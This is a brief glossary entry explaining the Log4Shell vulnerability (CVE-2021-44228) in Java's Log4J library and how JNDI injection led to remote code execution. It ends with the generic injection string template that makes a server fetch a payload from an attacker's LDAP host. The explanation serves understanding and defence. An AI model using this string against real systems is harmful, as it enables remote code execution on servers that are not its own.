cybersecurity Glossary

What is Log4Shell?

Log4Shell is a remote vulnerability that affects the Java Log4J component used by thousands of applications to keep logs of application activity.

The name Log4Shell was assigned to the vulnerability identified by Miter as CVE-2021-44228 and it took advantage of a data filtering flaw that reaches this component, allowing a JNDI injection to be carried out. Through this flaw it was possible to inject specially crafted strings that allowed arbitrary code execution.

In most cases, it was simply necessary to add this content to any HTTP request to force the Log4J component to establish a connection against the attacker’s ldap server and execute arbitrary code.

${jndi:ldap://[server]/[payload]}